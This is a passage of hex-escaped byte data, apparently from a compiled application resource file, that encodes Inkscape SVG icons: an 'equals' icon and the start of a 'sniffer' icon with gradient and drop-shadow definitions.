\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x33\x32\
\x70\x78\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x33\
\x32\x70\x78\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\
\x22\x30\x20\x30\x20\x33\x32\x20\x33\x32\x22\x0a\x20\x20\x20\x76\
\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\
\x69\x64\x3d\x22\x53\x56\x47\x52\x6f\x6f\x74\x22\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x30\x2e\x39\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\
\x22\x65\x71\x75\x61\x6c\x73\x2e\x73\x76\x67\x22\x3e\x0a\x20\x20\
\x3c\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6e\x61\x6d\x65\x64\x76\
\x69\x65\x77\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x62\x61\x73\
\x65\x22\x0a\x20\x20\x20\x20\x20\x70\x61\x67\x65\x63\x6f\x6c\x6f\
\x72\x3d\x22\x23\x66\x66\x66\x66\x66\x66\x22\x0a\x20\x20\x20\x20\
\x20\x62\x6f\x72\x64\x65\x72\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x36\
\x36\x36\x36\x36\x36\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\
\x65\x72\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x31\x2e\x30\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\
\x67\x65\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\x2e\x30\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\
\x67\x65\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\
\x22\x31\x36\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x63\x78\x3d\x22\x2d\x37\x2e\x38\x33\x34\x30\x30\x32\
\x33\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x63\x79\x3d\x22\x39\x2e\x38\x31\x32\x35\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\x6d\
\x65\x6e\x74\x2d\x75\x6e\x69\x74\x73\x3d\x22\x70\x78\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\x72\
\x72\x65\x6e\x74\x2d\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\x65\
\x72\x31\x22\x0a\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\x69\
\x64\x3d\x22\x66\x61\x6c\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x77\
\x69\x64\x74\x68\x3d\x22\x31\x39\x32\x30\x22\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\
\x2d\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x31\x34\x31\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\
\x64\x6f\x77\x2d\x78\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\
\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\
\x7a\x65\x64\x3d\x22\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x67\x72\x69\x64\x2d\x62\x62\x6f\x78\x3d\
\x22\x74\x72\x75\x65\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x64\x65\x66\
\x73\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\x34\
\x34\x38\x35\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x6d\x65\x74\x61\x64\
\x61\x74\x61\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6d\x65\x74\
\x61\x64\x61\x74\x61\x34\x34\x38\x38\x22\x3e\x0a\x20\x20\x20\x20\
\x3c\x72\x64\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\x20\x20\x20\x20\
\x3c\x63\x63\x3a\x57\x6f\x72\x6b\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x72\x64\x66\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\x3e\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\
\x61\x74\x3e\x69\x6d\x61\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\
\x3c\x2f\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x79\x70\x65\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x72\x65\x73\
\x6f\x75\x72\x63\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\
\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x64\x63\x6d\x69\x74\x79\
\x70\x65\x2f\x53\x74\x69\x6c\x6c\x49\x6d\x61\x67\x65\x22\x20\x2f\
\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\
\x74\x6c\x65\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x63\
\x63\x3a\x57\x6f\x72\x6b\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x72\x64\
\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\x3c\x2f\x6d\x65\x74\x61\x64\
\x61\x74\x61\x3e\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\
\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\
\x45\x62\x65\x6e\x65\x20\x31\x22\x3e\x0a\x20\x20\x20\x20\x3c\x74\
\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x3a\x73\
\x70\x61\x63\x65\x3d\x22\x70\x72\x65\x73\x65\x72\x76\x65\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x6f\
\x6e\x74\x2d\x73\x74\x79\x6c\x65\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\
\x66\x6f\x6e\x74\x2d\x76\x61\x72\x69\x61\x6e\x74\x3a\x6e\x6f\x72\
\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x77\x65\x69\x67\x68\x74\x3a\
\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x73\x74\x72\x65\
\x74\x63\x68\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\
\x73\x69\x7a\x65\x3a\x38\x70\x78\x3b\x6c\x69\x6e\x65\x2d\x68\x65\
\x69\x67\x68\x74\x3a\x31\x2e\x32\x35\x3b\x66\x6f\x6e\x74\x2d\x66\
\x61\x6d\x69\x6c\x79\x3a\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\
\x64\x65\x20\x50\x72\x6f\x27\x3b\x2d\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x2d\x66\x6f\x6e\x74\x2d\x73\x70\x65\x63\x69\x66\x69\x63\x61\
\x74\x69\x6f\x6e\x3a\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\x64\
\x65\x20\x50\x72\x6f\x27\x3b\x6c\x65\x74\x74\x65\x72\x2d\x73\x70\
\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x77\x6f\x72\x64\x2d\x73\
\x70\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x66\x69\x6c\x6c\x3a\
\x23\x30\x30\x30\x30\x30\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\
\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\
\x6e\x65\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x78\x3d\x22\x38\x2e\
\x33\x37\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x79\x3d\x22\x37\
\x2e\x38\x37\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x74\x65\x78\x74\x35\x30\x39\x31\x22\x3e\x3c\x74\x73\x70\x61\
\x6e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\
\x6f\x64\x69\x3a\x72\x6f\x6c\x65\x3d\x22\x6c\x69\x6e\x65\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x74\x73\x70\
\x61\x6e\x35\x30\x38\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x78\x3d\x22\x38\x2e\x33\x37\x35\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x79\x3d\x22\x31\x34\x2e\x38\x37\x35\x22\x20\x2f\
\x3e\x3c\x2f\x74\x65\x78\x74\x3e\x0a\x20\x20\x20\x20\x3c\x67\x0a\
\x20\x20\x20\x20\x20\x20\x20\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\
\x3d\x22\x74\x72\x61\x6e\x73\x6c\x61\x74\x65\x28\x2d\x32\x2e\x38\
\x30\x34\x36\x38\x37\x36\x2c\x2d\x30\x2e\x30\x35\x32\x37\x33\x34\
\x33\x29\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x61\x72\x69\x61\x2d\
\x6c\x61\x62\x65\x6c\x3d\x22\x20\xe2\x89\x9f\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x6f\x6e\x74\x2d\
\x73\x74\x79\x6c\x65\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\
\x74\x2d\x76\x61\x72\x69\x61\x6e\x74\x3a\x6e\x6f\x72\x6d\x61\x6c\
\x3b\x66\x6f\x6e\x74\x2d\x77\x65\x69\x67\x68\x74\x3a\x39\x30\x30\
\x3b\x66\x6f\x6e\x74\x2d\x73\x74\x72\x65\x74\x63\x68\x3a\x6e\x6f\
\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x73\x69\x7a\x65\x3a\x34\
\x30\x70\x78\x3b\x6c\x69\x6e\x65\x2d\x68\x65\x69\x67\x68\x74\x3a\
\x31\x2e\x32\x35\x3b\x66\x6f\x6e\x74\x2d\x66\x61\x6d\x69\x6c\x79\
\x3a\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\x64\x65\x20\x50\x72\
\x6f\x27\x3b\x2d\x69\x6e\x6b\x73\x63\x61\x70\x65\x2d\x66\x6f\x6e\
\x74\x2d\x73\x70\x65\x63\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x3a\
\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\x64\x65\x20\x50\x72\x6f\
\x20\x48\x65\x61\x76\x79\x27\x3b\x6c\x65\x74\x74\x65\x72\x2d\x73\
\x70\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x77\x6f\x72\x64\x2d\
\x73\x70\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x66\x69\x6c\x6c\
\x3a\x23\x30\x30\x35\x35\x64\x34\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\
\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\
\x6f\x6e\x65\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\
\x74\x65\x78\x74\x35\x30\x34\x36\x22\x20\x2f\x3e\x0a\x20\x20\x20\
\x20\x3c\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\
\x3d\x22\x70\x61\x74\x68\x35\x36\x38\x37\x22\x0a\x20\x20\x20\x20\
\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\
\x30\x30\x35\x35\x64\x34\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\
\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\x6e\
\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x30\
\x2e\x39\x34\x34\x38\x38\x31\x39\x32\x3b\x73\x74\x72\x6f\x6b\x65\
\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\
\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\
\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\
\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x64\x3d\x22\
\x4d\x20\x33\x2e\x31\x30\x35\x34\x36\x38\x37\x2c\x31\x38\x2e\x31\
\x31\x39\x31\x34\x31\x20\x48\x20\x32\x38\x2e\x31\x34\x34\x35\x33\
\x31\x20\x76\x20\x34\x2e\x36\x32\x38\x39\x30\x36\x20\x48\x20\x33\
\x2e\x31\x30\x35\x34\x36\x38\x37\x20\x5a\x20\x6d\x20\x30\x2c\x2d\
\x38\x2e\x38\x38\x36\x37\x31\x39\x20\x48\x20\x32\x38\x2e\x31\x34\
\x34\x35\x33\x31\x20\x76\x20\x34\x2e\x35\x38\x39\x38\x34\x34\x20\
\x48\x20\x33\x2e\x31\x30\x35\x34\x36\x38\x37\x20\x5a\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\
\x6f\x6e\x6e\x65\x63\x74\x6f\x72\x2d\x63\x75\x72\x76\x61\x74\x75\
\x72\x65\x3d\x22\x30\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x2f\x67\x3e\
\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x00\x16\x45\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x6f\
\x73\x62\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x6f\
\x70\x65\x6e\x73\x77\x61\x74\x63\x68\x62\x6f\x6f\x6b\x2e\x6f\x72\
\x67\x2f\x75\x72\x69\x2f\x32\x30\x30\x39\x2f\x6f\x73\x62\x22\x0a\
\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\x63\x3d\x22\x68\x74\x74\
\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\
\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\x2e\x31\x2f\x22\x0a\x20\
\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\x3d\x22\x68\x74\x74\x70\
\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\x65\x63\x6f\x6d\x6d\x6f\
\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\x22\x0a\x20\x20\x20\x78\
\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\
\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x31\x39\x39\x39\
\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\x2d\x73\x79\x6e\x74\x61\
\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\
\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\
\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\
\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\
\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\x68\x74\x74\x70\x3a\x2f\
\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\x73\x6f\x75\x72\x63\x65\
\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\x44\x54\x44\x2f\x73\x6f\
\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\x74\x64\x22\x0a\x20\x20\
\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\x73\x63\x61\x70\x65\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\x61\x6d\x65\x73\x70\x61\
\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\x70\x65\x22\x0a\x20\x20\
\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x36\x70\x78\x22\x0a\x20\x20\
\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x36\x70\x78\x22\x0a\x20\
\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x31\
\x36\x20\x31\x36\x22\x0a\x20\x20\x20\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\x69\x64\x3d\x22\x53\x56\
\x47\x52\x6f\x6f\x74\x22\x0a\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\
\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\x22\x73\x6e\x69\x66\
\x66\x65\x72\x2e\x73\x76\x67\x22\x0a\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x30\x2e\
\x39\x32\x2e\x31\x20\x72\x22\x3e\x0a\x20\x20\x3c\x73\x6f\x64\x69\
\x70\x6f\x64\x69\x3a\x6e\x61\x6d\x65\x64\x76\x69\x65\x77\x0a\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x62\x61\x73\x65\x22\x0a\x20\x20\
\x20\x20\x20\x70\x61\x67\x65\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x66\
\x66\x66\x66\x66\x66\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\
\x65\x72\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x36\x36\x36\x36\x36\x36\
\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\x6f\x70\x61\
\x63\x69\x74\x79\x3d\x22\x31\x2e\x30\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\x6f\x70\x61\
\x63\x69\x74\x79\x3d\x22\x30\x2e\x30\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\x73\x68\x61\
\x64\x6f\x77\x3d\x22\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\x22\x33\x32\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x78\
\x3d\x22\x32\x2e\x37\x38\x34\x38\x34\x36\x39\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x79\x3d\x22\x39\
\x2e\x35\x37\x33\x34\x36\x34\x39\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\x6d\x65\x6e\x74\
\x2d\x75\x6e\x69\x74\x73\x3d\x22\x70\x78\x22\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\x72\x72\x65\x6e\
\x74\x2d\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\
\x0a\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\x69\x64\x3d\x22\
\x66\x61\x6c\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x77\x69\x64\x74\
\x68\x3d\x22\x31\x39\x32\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x68\x65\
\x69\x67\x68\x74\x3d\x22\x31\x31\x34\x31\x22\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\
\x2d\x78\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\x3d\x22\x30\
\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\
\x77\x69\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\x7a\x65\x64\
\x3d\x22\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x67\x72\x69\x64\x2d\x62\x62\x6f\x78\x3d\x22\x74\x72\
\x75\x65\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x64\x65\x66\x73\x0a\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\x35\x30\x33\x36\
\x22\x3e\x0a\x20\x20\x20\x20\x3c\x6c\x69\x6e\x65\x61\x72\x47\x72\
\x61\x64\x69\x65\x6e\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\
\x3d\x22\x6c\x69\x6e\x65\x61\x72\x47\x72\x61\x64\x69\x65\x6e\x74\
\x37\x30\x37\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x6f\x73\x62\
\x3a\x70\x61\x69\x6e\x74\x3d\x22\x73\x6f\x6c\x69\x64\x22\x3e\x0a\
\x20\x20\x20\x20\x20\x20\x3c\x73\x74\x6f\x70\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x73\x74\x6f\x70\
\x2d\x63\x6f\x6c\x6f\x72\x3a\x23\x61\x61\x63\x63\x66\x66\x3b\x73\
\x74\x6f\x70\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x66\x66\x73\x65\x74\x3d\
\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x73\x74\x6f\x70\x37\x30\x37\x37\x22\x20\x2f\x3e\x0a\x20\x20\
\x20\x20\x3c\x2f\x6c\x69\x6e\x65\x61\x72\x47\x72\x61\x64\x69\x65\
\x6e\x74\x3e\x0a\x20\x20\x20\x20\x3c\x66\x69\x6c\x74\x65\x72\x0a\
\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x63\x6f\
\x6c\x6f\x72\x2d\x69\x6e\x74\x65\x72\x70\x6f\x6c\x61\x74\x69\x6f\
\x6e\x2d\x66\x69\x6c\x74\x65\x72\x73\x3a\x73\x52\x47\x42\x3b\x22\
\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x6c\x61\x62\x65\x6c\x3d\x22\x44\x72\x6f\x70\x20\x53\x68\x61\
\x64\x6f\x77\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\
\x66\x69\x6c\x74\x65\x72\x39\x31\x34\x22\x3e\x0a\x20\x20\x20\x20\
\x20\x20\x3c\x66\x65\x46\x6c\x6f\x6f\x64\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x66\x6c\x6f\x6f\x64\x2d\x6f\x70\x61\x63\x69\x74\
\x79\x3d\x22\x30\x2e\x34\x39\x38\x30\x33\x39\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x66\x6c\x6f\x6f\x64\x2d\x63\x6f\x6c\x6f\
\x72\x3d\x22\x72\x67\x62\x28\x30\x2c\x30\x2c\x30\x29\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x3d\x22\
\x66\x6c\x6f\x6f\x64\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\
\x69\x64\x3d\x22\x66\x65\x46\x6c\x6f\x6f\x64\x39\x30\x34\x22\x20\
\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x66\x65\x43\x6f\x6d\x70\
\x6f\x73\x69\x74\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\
\x6e\x3d\x22\x66\x6c\x6f\x6f\x64\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x69\x6e\x32\x3d\x22\x53\x6f\x75\x72\x63\x65\x47\x72\
\x61\x70\x68\x69\x63\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\
\x6f\x70\x65\x72\x61\x74\x6f\x72\x3d\x22\x69\x6e\x22\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x3d\x22\x63\
\x6f\x6d\x70\x6f\x73\x69\x74\x65\x31\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x66\x65\x43\x6f\x6d\x70\x6f\x73\
\x69\x74\x65\x39\x30\x36\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\
\x20\x3c\x66\x65\x47\x61\x75\x73\x73\x69\x61\x6e\x42\x6c\x75\x72\
